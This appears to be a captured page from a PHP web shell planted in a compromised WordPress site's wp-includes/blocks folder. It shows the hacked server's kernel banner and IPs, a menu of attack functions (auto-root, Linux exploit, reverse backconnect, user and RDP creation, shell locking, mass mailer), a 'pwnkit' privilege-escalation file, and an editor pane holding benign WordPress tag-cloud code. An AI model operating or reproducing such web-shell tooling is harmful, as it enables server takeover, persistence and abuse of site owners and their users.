Linux webm008.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.110.20.8 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
5.4.45
einst
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
einst /
www_1 /
wp-includes /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
archives.php
3.24
KB
-rw----r--
block.php
859
B
-rw----r--
calendar.php
1.94
KB
-rw----r--
categories.php
2.53
KB
-rw----r--
latest-comments.php
5.42
KB
-rw----r--
latest-posts.php
3.03
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
rss.php
3.84
KB
-rw----r--
search.php
1.81
KB
-rw----r--
shortcode.php
678
B
-rw----r--
tag-cloud.php
1.47
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tag-cloud.php
<?php /** * Server-side rendering of the `core/tag-cloud` block. * * @package WordPress */ /** * Renders the `core/tag-cloud` block on server. * * @param array $attributes The block attributes. * * @return string Returns the tag cloud for selected taxonomy. */ function render_block_core_tag_cloud( $attributes ) { $class = isset( $attributes['align'] ) ? "wp-block-tag-cloud align{$attributes['align']}" : 'wp-block-tag-cloud'; if ( isset( $attributes['className'] ) ) { $class .= ' ' . $attributes['className']; } $args = array( 'echo' => false, 'taxonomy' => $attributes['taxonomy'], 'show_count' => $attributes['showTagCounts'], ); $tag_cloud = wp_tag_cloud( $args ); if ( ! $tag_cloud ) { $tag_cloud = esc_html( __( 'No terms to show.' ) ); } return sprintf( '<p class="%1$s">%2$s</p>', esc_attr( $class ), $tag_cloud ); } /** * Registers the `core/tag-cloud` block on server. */ function register_block_core_tag_cloud() { register_block_type( 'core/tag-cloud', array( 'attributes' => array( 'taxonomy' => array( 'type' => 'string', 'default' => 'post_tag', ), 'className' => array( 'type' => 'string', ), 'showTagCounts' => array( 'type' => 'boolean', 'default' => false, ), 'align' => array( 'type' => 'string', ), ), 'render_callback' => 'render_block_core_tag_cloud', ) ); } add_action( 'init', 'register_block_core_tag_cloud' );
Close